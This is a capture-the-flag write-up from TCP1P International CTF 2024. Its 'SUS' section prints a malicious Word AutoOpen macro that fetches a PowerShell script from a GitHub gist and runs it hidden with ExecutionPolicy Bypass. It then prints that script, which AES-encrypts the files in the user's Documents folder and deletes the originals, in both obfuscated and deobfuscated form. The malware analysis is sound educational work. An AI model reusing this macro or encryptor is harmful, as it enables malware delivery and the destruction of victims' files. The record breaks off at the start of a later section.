TCP1P International CTF 2024
TCP1P International CTF
When this CTFs was occuring, our team weren’t participate much, there only 3-4 person so we only managed to clear OSINT and do some Forensics challenges but some how we still placed 45/1109, anyway hope you found something useful in this write-up of mine
SUS
So the Challenge gave us 2 zipped file, one contain a Docm and the other contains both the flag and password to unzip it but they seem to be encrypted.
Lets investigate the Docm first, based on the extension, we already knew that it contain MacroScript.
VBA MACRO Module1.bas
in file: word/vbaProject.bin - OLE stream: u'VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub AutoOpen()
Dim bea2b19e869d906e19c2c5845ef99d624 As String
Dim c1d374ac555d2f2500e5eba113b6d19df As String
Dim b3d8f69e6a1e4e380a0b578412bb4728d As Object
Dim e9a6a8866fc9657d77dc59f191d20178e As Object
Dim fb6c5e53b78f831ff071400fd4987886a As Object
Dim a6482a3f94854f5920ef720dbf7944d49 As String
Dim a7eeee37ce4d5f1ce4d968ed8fdd9bcbb As String
Dim a3e2b2a4914ae8d53ed6948f3f0d709b9 As String
Dim a79e6d2cfe11f015751beca1f2ad01f35 As String
Dim c19fe1eb6132de0cf2af80dcaf58865d3 As String
Dim e71d80072ff5e54f8ede746c30dcd1d7a As String
Dim f7182dd21d513b01e2797c451341280d0 As String
a6482a3f94854f5920ef720dbf7944d49 = "https://gist.gith"
a7eeee37ce4d5f1ce4d968ed8fdd9bcbb = "ubusercontent.co"
a3e2b2a4914ae8d53ed6948f3f0d709b9 = "m/daffainfo/20a7b18ee31bd6a22acd1a90c1c7acb9"
a79e6d2cfe11f015751beca1f2ad01f35 = "/raw/670f8d57403a02169d5e63e2f705bd4652781953/test.ps1"
c19fe1eb6132de0cf2af80dcaf58865d3 = Environ("USERPROFILE")
e71d80072ff5e54f8ede746c30dcd1d7a = "\Docum"
f7182dd21d513b01e2797c451341280d0 = "ents\test.ps1"
bea2b19e869d906e19c2c5845ef99d624 = a6482a3f94854f5920ef720dbf7944d49 & a7eeee37ce4d5f1ce4d968ed8fdd9bcbb & a3e2b2a4914ae8d53ed6948f3f0d709b9 & a79e6d2cfe11f015751beca1f2ad01f35
c1d374ac555d2f2500e5eba113b6d19df = c19fe1eb6132de0cf2af80dcaf58865d3 & e71d80072ff5e54f8ede746c30dcd1d7a & f7182dd21d513b01e2797c451341280d0
Set b3d8f69e6a1e4e380a0b578412bb4728d = CreateObject("MSXML2.XMLHTTP")
b3d8f69e6a1e4e380a0b578412bb4728d.Open "GET", bea2b19e869d906e19c2c5845ef99d624, False
b3d8f69e6a1e4e380a0b578412bb4728d.Send
Set e9a6a8866fc9657d77dc59f191d20178e = CreateObject("ADODB.Stream")
e9a6a8866fc9657d77dc59f191d20178e.Type = 1
e9a6a8866fc9657d77dc59f191d20178e.Open
e9a6a8866fc9657d77dc59f191d20178e.Write b3d8f69e6a1e4e380a0b578412bb4728d.responseBody
e9a6a8866fc9657d77dc59f191d20178e.SaveToFile c1d374ac555d2f2500e5eba113b6d19df, 2
e9a6a8866fc9657d77dc59f191d20178e.Close
Set fb6c5e53b78f831ff071400fd4987886a = CreateObject("WScript.Shell")
fb6c5e53b78f831ff071400fd4987886a.Run "powershell.exe -ExecutionPolicy Bypass -File """ & c1d374ac555d2f2500e5eba113b6d19df & """", 0, False
Set b3d8f69e6a1e4e380a0b578412bb4728d = Nothing
Set e9a6a8866fc9657d77dc59f191d20178e = Nothing
Set fb6c5e53b78f831ff071400fd4987886a = Nothing
End Sub
+----------+--------------------+---------------------------------------------+
|Type |Keyword |Description |
+----------+--------------------+---------------------------------------------+
|AutoExec |AutoOpen |Runs when the Word document is opened |
|Suspicious|CreateObject |May create an OLE object |
|Suspicious|ADODB.Stream |May create a text file |
|Suspicious|SaveToFile |May create a text file |
|Suspicious|Environ |May read system environment variables |
|Suspicious|Shell |May run an executable file or a system |
| | |command |
|Suspicious|WScript.Shell |May run an executable file or a system |
| | |command |
|Suspicious|Run |May run an executable file or a system |
| | |command |
|Suspicious|powershell |May run PowerShell commands |
|Suspicious|ExecutionPolicy |May run PowerShell commands |
|Suspicious|Open |May open a file |
|Suspicious|Write |May write to a file (if combined with Open) |
|Suspicious|MSXML2.XMLHTTP |May download files from the Internet |
|Suspicious|Hex Strings |Hex-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
|Suspicious|Base64 Strings |Base64-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
|IOC |https://gist.gith |URL |
|IOC |test.ps1 |Executable file name |
|IOC |powershell.exe |Executable file name |
+----------+--------------------+---------------------------------------------+So it downloaded a powershell script and executeed it, let see what inside the ps1 script
a6482a3f94854f5920ef720dbf7944d49 = "https://gist.gith"
a7eeee37ce4d5f1ce4d968ed8fdd9bcbb = "ubusercontent.co"
a3e2b2a4914ae8d53ed6948f3f0d709b9 = "m/daffainfo/20a7b18ee31bd6a22acd1a90c1c7acb9"
a79e6d2cfe11f015751beca1f2ad01f35 = "/raw/670f8d57403a02169d5e63e2f705bd4652781953/test.ps1"
c19fe1eb6132de0cf2af80dcaf58865d3 = Environ("USERPROFILE")
e71d80072ff5e54f8ede746c30dcd1d7a = "\Docum"
f7182dd21d513b01e2797c451341280d0 = "ents\test.ps1"Here is the Ps1 script:
function hLBKckxyHxqsbnKPcxuEltxXJgGMBEdtenTXDbrjJ {
param (
[byte[]]$fILecontEnt,
[byte[]]$kEy,
[byte[]]$iv
)
$wTxNPLpDKLd94wOiw4Ir9ecQJi8l7ym3AqKM2mVsyR7Sk5KD7sghlW3gm3oXNKd1Bws7xX82MZxhwERgFUw9C7YvJ5ffftPxo1p8kRQB1UZUQNiffkfdQqIEV0u1skAhCvTH6MglyDXo03BW = [sYstem.SeCurITy.CRYpTOgrapHy.aes]::Create()
$wTxNPLpDKLd94wOiw4Ir9ecQJi8l7ym3AqKM2mVsyR7Sk5KD7sghlW3gm3oXNKd1Bws7xX82MZxhwERgFUw9C7YvJ5ffftPxo1p8kRQB1UZUQNiffkfdQqIEV0u1skAhCvTH6MglyDXo03BW.Mode = [SysTeM.secURitY.CrYPtOGrAPhy.CiPhermodE]::CBC
$wTxNPLpDKLd94wOiw4Ir9ecQJi8l7ym3AqKM2mVsyR7Sk5KD7sghlW3gm3oXNKd1Bws7xX82MZxhwERgFUw9C7YvJ5ffftPxo1p8kRQB1UZUQNiffkfdQqIEV0u1skAhCvTH6MglyDXo03BW.Padding = [sySTEm.sEcuRITY.cRypTOGRAphY.PAdDINgMOdE]::PKCS7
$wTxNPLpDKLd94wOiw4Ir9ecQJi8l7ym3AqKM2mVsyR7Sk5KD7sghlW3gm3oXNKd1Bws7xX82MZxhwERgFUw9C7YvJ5ffftPxo1p8kRQB1UZUQNiffkfdQqIEV0u1skAhCvTH6MglyDXo03BW.Key = $kEy
$wTxNPLpDKLd94wOiw4Ir9ecQJi8l7ym3AqKM2mVsyR7Sk5KD7sghlW3gm3oXNKd1Bws7xX82MZxhwERgFUw9C7YvJ5ffftPxo1p8kRQB1UZUQNiffkfdQqIEV0u1skAhCvTH6MglyDXo03BW.IV = $iv
$4ZpO3FrslYBfVuEShaxppH8Zf9HelBcL1FxNFaiAcjxYNwzBAHGKSqaaGPMNzUrSVlQoruGFnUvyoZ9C7r6E8WBNg8yYbyssax2zMD65rC6DieNrucmPbwiQ4nYJayTvj1I3ssiq5YAbBkoADqgpIDH6iOUh07Iq9e4ORYeVKveFRv5aHxPdC7nXSh7FnXhgtJSuu7eYGdAqz0I88GquEPxf58nMqDIZP9MQGOrdChcMf0zyA19TPGeNILQjC7eCeOPwiLvdy0DEfMMxOuFZx5Ou3PwEwwb9qzGOgr6SZUczRXgEYdwU0MJxLyFa5vaBSdFlL1goffcJ1VlRRC087j3LZOTT30I6MCN16Sw9CtUooJk45GknpBZhJCbKErCC0so2xzYaNjiAXiZe9A5xY7GNyS4Z4r5VZDTyZ1UleUYqvKkhe2yCkn33o7r58EzAHveKoZxPnbSZfTExpUjtheb6Ir22bCWOr2sOKcxuHD8RVfyMf2YZxQvtKZD3Ens7oijHO8r8RCXJdUYtfAqj2k7WPWXu4OZabgat88t9iw2ZxrlpKGLBUGG3oN3qfWLHCYJolp0HsQe3vCxjRRsSArsElUGVcil8yx8UEzds4SDSCPcKtwo3KPGOYq6VCu0i6BR4FyiFiC8GaZBwbaMg7gdEOGDorLZi9rWFBo8cCP7Z3NeWa1CS0FfmcCw9sMnH2GBzyUTwdyfgonyYv60lF2AZuw8oBZ23XoIVsF = $wTxNPLpDKLd94wOiw4Ir9ecQJi8l7ym3AqKM2mVsyR7Sk5KD7sghlW3gm3oXNKd1Bws7xX82MZxhwERgFUw9C7YvJ5ffftPxo1p8kRQB1UZUQNiffkfdQqIEV0u1skAhCvTH6MglyDXo03BW.CreateEncryptor()
$DXXz8S7pnOuaDS9FGQAjFPedgyTLKRAo0VrSiEeapMS2KhDtpkl5pKgvcOWX2alqTTjzLGZdhlk89fvJSVnz60ULMAqbhqtk3RBNknNlTyVwsVfCHPscnLcJ1t5lnqWk5Fgavou4verArREYROVobRJheCuAIHadaRAWsLav9L9IvkjyrQRLWEZDeax8yiqLL2jq3XhgEZBiIwRcKVWEzzu1nKUPH4ZD8lLJMWaR9PeOkU4Is24EhvSaWiO9KDHsdqXjRdiVwg3lgeKpmrL6W1eujyZrgLZ2HxjZKQTICYQJDzusj5bEIDKCLjRSbw3p6Tgq2pDBSQ5kQ6DS6N2OKQYnzZ1qAA0lzftsg3b8FwM36shlBE0ToDeNrl4FkKDB6UQKxK1lcbO2tahobkh9XnUbKVvPKCzctMPuEmmKohLc6m3d5xo0Jk8Ge39tmNkO6W4CEg0t3LsTSyUlhFyUY8ePj1PEPEWMCxj8VW0CGAe7Z2jnJQdj431g5HEGtw32LBpxq4k85XtQ00UsOZTgg00HPGs4061TjREcskVs2IEZSgKwLW1SCyBa1FDfxiC1IH6PDrTKd2tLvfgWr1bgwqL5wlIWQQ64MgGxqhnaZq = $4ZpO3FrslYBfVuEShaxppH8Zf9HelBcL1FxNFaiAcjxYNwzBAHGKSqaaGPMNzUrSVlQoruGFnUvyoZ9C7r6E8WBNg8yYbyssax2zMD65rC6DieNrucmPbwiQ4nYJayTvj1I3ssiq5YAbBkoADqgpIDH6iOUh07Iq9e4ORYeVKveFRv5aHxPdC7nXSh7FnXhgtJSuu7eYGdAqz0I88GquEPxf58nMqDIZP9MQGOrdChcMf0zyA19TPGeNILQjC7eCeOPwiLvdy0DEfMMxOuFZx5Ou3PwEwwb9qzGOgr6SZUczRXgEYdwU0MJxLyFa5vaBSdFlL1goffcJ1VlRRC087j3LZOTT30I6MCN16Sw9CtUooJk45GknpBZhJCbKErCC0so2xzYaNjiAXiZe9A5xY7GNyS4Z4r5VZDTyZ1UleUYqvKkhe2yCkn33o7r58EzAHveKoZxPnbSZfTExpUjtheb6Ir22bCWOr2sOKcxuHD8RVfyMf2YZxQvtKZD3Ens7oijHO8r8RCXJdUYtfAqj2k7WPWXu4OZabgat88t9iw2ZxrlpKGLBUGG3oN3qfWLHCYJolp0HsQe3vCxjRRsSArsElUGVcil8yx8UEzds4SDSCPcKtwo3KPGOYq6VCu0i6BR4FyiFiC8GaZBwbaMg7gdEOGDorLZi9rWFBo8cCP7Z3NeWa1CS0FfmcCw9sMnH2GBzyUTwdyfgonyYv60lF2AZuw8oBZ23XoIVsF.TransformFinalBlock($fILecontEnt, 0, $fILecontEnt.Length)
$wTxNPLpDKLd94wOiw4Ir9ecQJi8l7ym3AqKM2mVsyR7Sk5KD7sghlW3gm3oXNKd1Bws7xX82MZxhwERgFUw9C7YvJ5ffftPxo1p8kRQB1UZUQNiffkfdQqIEV0u1skAhCvTH6MglyDXo03BW.Dispose()
return $DXXz8S7pnOuaDS9FGQAjFPedgyTLKRAo0VrSiEeapMS2KhDtpkl5pKgvcOWX2alqTTjzLGZdhlk89fvJSVnz60ULMAqbhqtk3RBNknNlTyVwsVfCHPscnLcJ1t5lnqWk5Fgavou4verArREYROVobRJheCuAIHadaRAWsLav9L9IvkjyrQRLWEZDeax8yiqLL2jq3XhgEZBiIwRcKVWEzzu1nKUPH4ZD8lLJMWaR9PeOkU4Is24EhvSaWiO9KDHsdqXjRdiVwg3lgeKpmrL6W1eujyZrgLZ2HxjZKQTICYQJDzusj5bEIDKCLjRSbw3p6Tgq2pDBSQ5kQ6DS6N2OKQYnzZ1qAA0lzftsg3b8FwM36shlBE0ToDeNrl4FkKDB6UQKxK1lcbO2tahobkh9XnUbKVvPKCzctMPuEmmKohLc6m3d5xo0Jk8Ge39tmNkO6W4CEg0t3LsTSyUlhFyUY8ePj1PEPEWMCxj8VW0CGAe7Z2jnJQdj431g5HEGtw32LBpxq4k85XtQ00UsOZTgg00HPGs4061TjREcskVs2IEZSgKwLW1SCyBa1FDfxiC1IH6PDrTKd2tLvfgWr1bgwqL5wlIWQQ64MgGxqhnaZq
}
function WcxUfvPWkvdEVTxpneCnitDtrlZHcKcSeHVCeaEp {
param (
[string]$fOlDErPATH,
[byte[]]$kEy,
[byte[]]$iv
)
$ruwyDTHxzj2yBGWIPwvbLpJnNrJOcjfEwbNAYo22RfjY5OoHUzHkddzfFgxti8eorqWgjcyHAnQ9UmDQBRPOd4FAnE9NSX2291RTqvXgJqElPncuBwkR00iFiJV56fvqTRf4KGpxC1gu8xZOcSUgl52IOnbtkxSwsKuyFL0cg3eKixJwUPFzrVBxQGxBVl9XLg1yJvzLhKLPdxoHx0CJSoIkb32GMwmEocab0TKn2OW4q5wlQYwcuuPoT6HNSMjm8l9Xtrw9HtKNXgwkgF1v4pl4Gl6TKC23qONwmpb0dpgA6PuHfZNGEdvLeVepSB6Uk1xIcEZupXGNBoh1RAxpU8fyFzdz2wR1wjJ2WfQYzglkldSkJ91bTq4Lw3ryqLbD8dvSAEbHtFvMMlj2UWOOUz1izDA3ClSHG8HDKBU9fwmWWTJ9Vkttn0kXN4TidTGWXsMQzEmhWaejsrx3tuaJOkjTbakAr3FM8hKYwZa0B9l4XzCcjNS1VjI0vYce6P9grcrwVzC4stLz03haaD7zCNYpfI4dR2vZwhxWUCSX6ENCL5gSKQ9oiSTKdAxFeENgvijkVywmepxoZvnY7foTVyn577oJou7hO5l0f5lmVSCPDRtGDb37XPMWFwTbiQZYcO3538aMKGXs7ssxSGD6tXM0VTF7zfuup2PlqmJt8ynIvtNhasiFVqjEUDliWUnaQhShdfvO6ZenHvTAVwPlHD47VvNKWTfUku6rr04Hfh9MB16vQp3OYDc5of0FsCE58gMo3QQOIUYjgyKjQ229o2jxleSJifhoKd4sYvwVz27xU3lQWrhFvi5ig4MZgDB0HiXFkjwWRI17ePVUZ91uyNmHNOgp5HLtnSKT3oS64fbThuZmndmxiQfECivujcSKXROqdxdvMd52ZLWafN7C9mc6TGHe6xrMYAx4AwQDi2g7Us = Get-ChildItem -Path $fOlDErPATH -File
foreach ($fILE in $ruwyDTHxzj2yBGWIPwvbLpJnNrJOcjfEwbNAYo22RfjY5OoHUzHkddzfFgxti8eorqWgjcyHAnQ9UmDQBRPOd4FAnE9NSX2291RTqvXgJqElPncuBwkR00iFiJV56fvqTRf4KGpxC1gu8xZOcSUgl52IOnbtkxSwsKuyFL0cg3eKixJwUPFzrVBxQGxBVl9XLg1yJvzLhKLPdxoHx0CJSoIkb32GMwmEocab0TKn2OW4q5wlQYwcuuPoT6HNSMjm8l9Xtrw9HtKNXgwkgF1v4pl4Gl6TKC23qONwmpb0dpgA6PuHfZNGEdvLeVepSB6Uk1xIcEZupXGNBoh1RAxpU8fyFzdz2wR1wjJ2WfQYzglkldSkJ91bTq4Lw3ryqLbD8dvSAEbHtFvMMlj2UWOOUz1izDA3ClSHG8HDKBU9fwmWWTJ9Vkttn0kXN4TidTGWXsMQzEmhWaejsrx3tuaJOkjTbakAr3FM8hKYwZa0B9l4XzCcjNS1VjI0vYce6P9grcrwVzC4stLz03haaD7zCNYpfI4dR2vZwhxWUCSX6ENCL5gSKQ9oiSTKdAxFeENgvijkVywmepxoZvnY7foTVyn577oJou7hO5l0f5lmVSCPDRtGDb37XPMWFwTbiQZYcO3538aMKGXs7ssxSGD6tXM0VTF7zfuup2PlqmJt8ynIvtNhasiFVqjEUDliWUnaQhShdfvO6ZenHvTAVwPlHD47VvNKWTfUku6rr04Hfh9MB16vQp3OYDc5of0FsCE58gMo3QQOIUYjgyKjQ229o2jxleSJifhoKd4sYvwVz27xU3lQWrhFvi5ig4MZgDB0HiXFkjwWRI17ePVUZ91uyNmHNOgp5HLtnSKT3oS64fbThuZmndmxiQfECivujcSKXROqdxdvMd52ZLWafN7C9mc6TGHe6xrMYAx4AwQDi2g7Us) {
$fILEcontenT = [sysTeM.iO.fILe]::ReadAllBytes($fILE.FullName)
$tgLjoPhM5puXcpTyAOIdjMb6OG9958nEI5Lx5piyjqm8M0abTMc1nCOYEEIBEjPOa0zajfg9Mgz5u87NGwOB32Ddo6VSkdMYnooOLzQtvUfpyFts8DKDo8BR1o2WBtMcwbPHS1t0nh8Bls9GxSVzE3stsmuQLDDgsI3BNJUe9DHX7iqnbGW5dtIOdCOyHQNBArVmCP3ylp2IWfLgDg9FUGtbXLkfSyNFHRkBK7b3HcKiYrXGBeAUbRW2E2PzfUElFGGPuJoBothFXCg6DPMlujc8OUPXpf5G6doRsDCChq94RHkYwluiczWsVpaiaxdHw3FG4xwsmtqSvclHZwN4Zuz4fTGTdlwcnWw402QytPUmChOTzIymO3fYcHTbxRnewQLgl6ekCrcJAtfNFiG2Qluxhd8wVFTUcgYR2Bhjscovwq3T6CxwehUZbdcrUJCcOJmlNmr2kHU5rBJDDM0DZ9iO9w5MtRTeS0LqMb2Phzztrr1u6uLa6nhdcxIapxAXXgM9CzTEcaDrxKAb8dqft83oD0TVhVuc3V0ChuTuOveivUWldgB0QqlDX02Lw2IVr2IMz0vA867As4KaA4RI2su7jQwsmw = hLBKckxyHxqsbnKPcxuEltxXJgGMBEdtenTXDbrjJ -FileContent $fILEcontenT -Key $kEy -IV $iv
$S9uNiOu8MdsYWgx5NirCL84sYs3Y2bSQyyFDeSPfRvryc5qOATTztuCQlynrBn2ebciJeqTohssNMewKE7sYUvUhLnco9khiZk4TMbhPg2rWgyMB3d4ZnGY3r5Y0iVGh6RZ4u4GRbfCQRp4H2LZ85o6e4GvBILwEZGMcSycGTUcsUSHU9kMGdVqQIisI4GSQf2k1yEXpBFbOsT3cWX1VFVWYBkxv0Emxi5BUDo = $fILE.FullName + ("{0}{2}{1}" -f '.','nc','e')
[sysTeM.iO.fILe]::WriteAllBytes($S9uNiOu8MdsYWgx5NirCL84sYs3Y2bSQyyFDeSPfRvryc5qOATTztuCQlynrBn2ebciJeqTohssNMewKE7sYUvUhLnco9khiZk4TMbhPg2rWgyMB3d4ZnGY3r5Y0iVGh6RZ4u4GRbfCQRp4H2LZ85o6e4GvBILwEZGMcSycGTUcsUSHU9kMGdVqQIisI4GSQf2k1yEXpBFbOsT3cWX1VFVWYBkxv0Emxi5BUDo, $tgLjoPhM5puXcpTyAOIdjMb6OG9958nEI5Lx5piyjqm8M0abTMc1nCOYEEIBEjPOa0zajfg9Mgz5u87NGwOB32Ddo6VSkdMYnooOLzQtvUfpyFts8DKDo8BR1o2WBtMcwbPHS1t0nh8Bls9GxSVzE3stsmuQLDDgsI3BNJUe9DHX7iqnbGW5dtIOdCOyHQNBArVmCP3ylp2IWfLgDg9FUGtbXLkfSyNFHRkBK7b3HcKiYrXGBeAUbRW2E2PzfUElFGGPuJoBothFXCg6DPMlujc8OUPXpf5G6doRsDCChq94RHkYwluiczWsVpaiaxdHw3FG4xwsmtqSvclHZwN4Zuz4fTGTdlwcnWw402QytPUmChOTzIymO3fYcHTbxRnewQLgl6ekCrcJAtfNFiG2Qluxhd8wVFTUcgYR2Bhjscovwq3T6CxwehUZbdcrUJCcOJmlNmr2kHU5rBJDDM0DZ9iO9w5MtRTeS0LqMb2Phzztrr1u6uLa6nhdcxIapxAXXgM9CzTEcaDrxKAb8dqft83oD0TVhVuc3V0ChuTuOveivUWldgB0QqlDX02Lw2IVr2IMz0vA867As4KaA4RI2su7jQwsmw)
Remove-Item $fILE.FullName
}
}
$kNTZHxWPKrOOROlpTvAyhuwGsegbxRPP0YBomB1ACpvkVBTc18Emj8lEGi4sPSA6xtLD0ToTaHcJF0m5Z2NKzjiF6DRdlVAfxFPFeYQ0Hhv8gjVDzPpH190fAesz = ("{4}{2}{9}{0}{7}{1}{5}{8}{3}{6}" -f '9PPHYu', 'VO2/HR', 'iu0qar', 'DBAUGB','K34VFi', 'pVrif', 'wgJCgsMDQ4P', 'e/KNLM','ikAAQI' , '9xWICc')
$kGWOOSVtqfxVCoXZVTCBu3nsOb2lJzP4Hb2ISBI8ZusTErhwdoCItM1qz8pP1ueeLscgyiPbBsOpoF3qVGWEwRlZ33XUT16TKhGlgCQwExeJMw2fCff3EymlFljE0SuJBoN71zIFwBezXGpARrAUI84Jro369CbPdJhI3Q3QwzyDYrgKvdpdxkprOuUvNvOqxTX3vaH0MVfDWAHCqQd6vKeZxYDqwfxJkgHdha7TFUiVSN58Ch0cClxDdnhBH37DSdPr335m8FY8u08bwcJeIOaWWKcQtl19vowhiYPjJ0NIV32TXOoeZja6AZuGM1cXygCGyg0DXXfaiDyYfJjPaypFlqaD3fg3fi0dtYRGVqQ0iZ2Owynmp8XlUZMko8IgNjd9hGgmf510SjFueala5ZSeeOEqb3PG85AGMQlbto6JDO2IsAOjjP0S4R7ZeEcGumWwLdUbAlMh8qELHrKv4CqsCa9ufRHX7ZYDmwPu2wux63xBjwJ4BiJZvEzKxfAvaXyhAteq2N1K7iEKsXsNbSGn1VidtvkO3gQw1qKN9yCY6DwrCD5MLiNIMV6USgZa3sya5zqN194ckT3VHwd3UK9HeZokwtgkR9hwWUdaaRZrT91qJg4G2hwxDouu35mZjQrgsRvrEehwsoDmFHSNCjNIAzfFC8RGUyB2qSpJc3PRNFwvwJ9eCB7BjaGHxhweJFqF3gP8NtgnH5kVs3TiO7Qld5Zis8t38McSeDcZVXDLRP7nK9mRePyrW4IdhktDg1bpsbhMTUgsacD4Sb6GCnABIwzrjvzltuSPKNsruF3qebC67YyYk7I8Ei3vuU94oexSvkxcxV0KNC41s7uq9mY0zVhAMuNl7Vbej1taJoOYhZfeK6D32VcfSDZFbmDBi57tR6SnIzyLnnWfEwS6Yv0RVwR7gGHX0brNL1U8IuG4Ya7nLbgqViwR2mgwambCdQUPOnNMWqBmJcNaYCl = [SYStEM.COnVERt]::FromBase64String($kNTZHxWPKrOOROlpTvAyhuwGsegbxRPP0YBomB1ACpvkVBTc18Emj8lEGi4sPSA6xtLD0ToTaHcJF0m5Z2NKzjiF6DRdlVAfxFPFeYQ0Hhv8gjVDzPpH190fAesz)
$kEy = $kGWOOSVtqfxVCoXZVTCBu3nsOb2lJzP4Hb2ISBI8ZusTErhwdoCItM1qz8pP1ueeLscgyiPbBsOpoF3qVGWEwRlZ33XUT16TKhGlgCQwExeJMw2fCff3EymlFljE0SuJBoN71zIFwBezXGpARrAUI84Jro369CbPdJhI3Q3QwzyDYrgKvdpdxkprOuUvNvOqxTX3vaH0MVfDWAHCqQd6vKeZxYDqwfxJkgHdha7TFUiVSN58Ch0cClxDdnhBH37DSdPr335m8FY8u08bwcJeIOaWWKcQtl19vowhiYPjJ0NIV32TXOoeZja6AZuGM1cXygCGyg0DXXfaiDyYfJjPaypFlqaD3fg3fi0dtYRGVqQ0iZ2Owynmp8XlUZMko8IgNjd9hGgmf510SjFueala5ZSeeOEqb3PG85AGMQlbto6JDO2IsAOjjP0S4R7ZeEcGumWwLdUbAlMh8qELHrKv4CqsCa9ufRHX7ZYDmwPu2wux63xBjwJ4BiJZvEzKxfAvaXyhAteq2N1K7iEKsXsNbSGn1VidtvkO3gQw1qKN9yCY6DwrCD5MLiNIMV6USgZa3sya5zqN194ckT3VHwd3UK9HeZokwtgkR9hwWUdaaRZrT91qJg4G2hwxDouu35mZjQrgsRvrEehwsoDmFHSNCjNIAzfFC8RGUyB2qSpJc3PRNFwvwJ9eCB7BjaGHxhweJFqF3gP8NtgnH5kVs3TiO7Qld5Zis8t38McSeDcZVXDLRP7nK9mRePyrW4IdhktDg1bpsbhMTUgsacD4Sb6GCnABIwzrjvzltuSPKNsruF3qebC67YyYk7I8Ei3vuU94oexSvkxcxV0KNC41s7uq9mY0zVhAMuNl7Vbej1taJoOYhZfeK6D32VcfSDZFbmDBi57tR6SnIzyLnnWfEwS6Yv0RVwR7gGHX0brNL1U8IuG4Ya7nLbgqViwR2mgwambCdQUPOnNMWqBmJcNaYCl[0..31]
$iv = $kGWOOSVtqfxVCoXZVTCBu3nsOb2lJzP4Hb2ISBI8ZusTErhwdoCItM1qz8pP1ueeLscgyiPbBsOpoF3qVGWEwRlZ33XUT16TKhGlgCQwExeJMw2fCff3EymlFljE0SuJBoN71zIFwBezXGpARrAUI84Jro369CbPdJhI3Q3QwzyDYrgKvdpdxkprOuUvNvOqxTX3vaH0MVfDWAHCqQd6vKeZxYDqwfxJkgHdha7TFUiVSN58Ch0cClxDdnhBH37DSdPr335m8FY8u08bwcJeIOaWWKcQtl19vowhiYPjJ0NIV32TXOoeZja6AZuGM1cXygCGyg0DXXfaiDyYfJjPaypFlqaD3fg3fi0dtYRGVqQ0iZ2Owynmp8XlUZMko8IgNjd9hGgmf510SjFueala5ZSeeOEqb3PG85AGMQlbto6JDO2IsAOjjP0S4R7ZeEcGumWwLdUbAlMh8qELHrKv4CqsCa9ufRHX7ZYDmwPu2wux63xBjwJ4BiJZvEzKxfAvaXyhAteq2N1K7iEKsXsNbSGn1VidtvkO3gQw1qKN9yCY6DwrCD5MLiNIMV6USgZa3sya5zqN194ckT3VHwd3UK9HeZokwtgkR9hwWUdaaRZrT91qJg4G2hwxDouu35mZjQrgsRvrEehwsoDmFHSNCjNIAzfFC8RGUyB2qSpJc3PRNFwvwJ9eCB7BjaGHxhweJFqF3gP8NtgnH5kVs3TiO7Qld5Zis8t38McSeDcZVXDLRP7nK9mRePyrW4IdhktDg1bpsbhMTUgsacD4Sb6GCnABIwzrjvzltuSPKNsruF3qebC67YyYk7I8Ei3vuU94oexSvkxcxV0KNC41s7uq9mY0zVhAMuNl7Vbej1taJoOYhZfeK6D32VcfSDZFbmDBi57tR6SnIzyLnnWfEwS6Yv0RVwR7gGHX0brNL1U8IuG4Ya7nLbgqViwR2mgwambCdQUPOnNMWqBmJcNaYCl[32..47]
$fOlDErPATH = ("$enV:USERPROFILE{4}{0}{3}" -F'umen','\Wo', 'i', 'ts', '\Doc')
WcxUfvPWkvdEVTxpneCnitDtrlZHcKcSeHVCeaEp -FolderPath $fOlDErPATH -Key $kEy -IV $ivIt got obfuscated, but you can still see that it use base64, key and IV, so it must be using base64 to encode the file first then AES encrypt it, let deobfuscate it shall we?
function lmao {
param (
[byte[]]$fILecontEnt,
[byte[]]$kEy,
[byte[]]$iv
)
$AES_ = [sYstem.SeCurITy.CRYpTOgrapHy.aes]::Create()
$AES_.Mode = [SysTeM.secURitY.CrYPtOGrAPhy.CiPhermodE]::CBC
$AES_.Padding = [sySTEm.sEcuRITY.cRypTOGRAphY.PAdDINgMOdE]::PKCS7
$AES_.Key = $kEy
$AES_.IV = $iv
$func2 = $enc.CreateEncryptor()
$abc = $func2.TransformFinalBlock($fILecontEnt, 0, $fILecontEnt.Length)
$enc.Dispose()
return $abc
}
function lmaolmao {
param (
[string]$fOlDErPATH,
[byte[]]$kEy,
[byte[]]$iv
)
$pc = Get-ChildItem -Path $fOlDErPATH -File
foreach ($fILE in $pc) {
$fILEcontenT = [sysTeM.iO.fILe]::ReadAllBytes($fILE.FullName)
$path = lmao -FileContent $fILEcontenT -Key $kEy -IV $iv
$name = $fILE.FullName + ("{0}{2}{1}" -f '.','nc','e')
[sysTeM.iO.fILe]::WriteAllBytes($name, $path)
Remove-Item $fILE.FullName
}
}
$data = ("{4}{2}{9}{0}{7}{1}{5}{8}{3}{6}" -f '9PPHYu', 'VO2/HR', 'iu0qar', 'DBAUGB','K34VFi', 'pVrif', 'wgJCgsMDQ4P', 'e/KNLM','ikAAQI' , '9xWICc')
$base64 = [SYStEM.COnVERt]::FromBase64String($data)
$kEy = $base64[0..31]
$iv = $base64[32..47]
$fOlDErPATH = ("$enV:USERPROFILE{4}{0}{3}" -F'umen','\Wo', 'i', 'ts', '\Doc')
lmaolmao -FolderPath $fOlDErPATH -Key $kEy -IV $ivOkay so after deobfs we can clearly see the key and iv it use for encryption, anyway here is my code to get the key and IV
import base64
data = "{4}{2}{9}{0}{7}{1}{5}{8}{3}{6}".format(
'9PPHYu', 'VO2/HR', 'iu0qar', 'DBAUGB', 'K34VFi', 'pVrif', 'wgJCgsMDQ4P', 'e/KNLM', 'ikAAQI', '9xWICc'
)
base64_bytes = base64.b64decode(data)
key = base64_bytes[0:32]
iv = base64_bytes[32:48]
key_hex = key.hex()
iv_hex = iv.hex()
print("Key (Hex):", key_hex)
print("IV (Hex):", iv_hex)Finally lets decrypt it
Flag: TCP1P{thank_g0ddd_youre_able_to_decrypt_my_files}
LostProgress
We got a dumped file and the challenge said something about the image and text file, I will check the process first
These 2 seem to be holding 2 part of the flag, I will start with the image first, I will dump the screen of gimp process, after a while searching I found the firstpart (next to Suisei)
Luckily I didn’t stop after finding out the first part, I keep searching and found the second part (unintended :>, the actual way of getting the second part is you have to use mftparser then grep for the keyword “password”, you can’t string it because, it a template notepad)
Flag: CP1P{wIeRRRMQqykX6zs3O7KSQY6Xq6z4TKnr_ekxyAH2jIrh0Opyu432tk9y0KdiujkMu}
SecreTalk
We also got a dumped file this time, so I will do the same thing as above, first check it process to identify the culprit
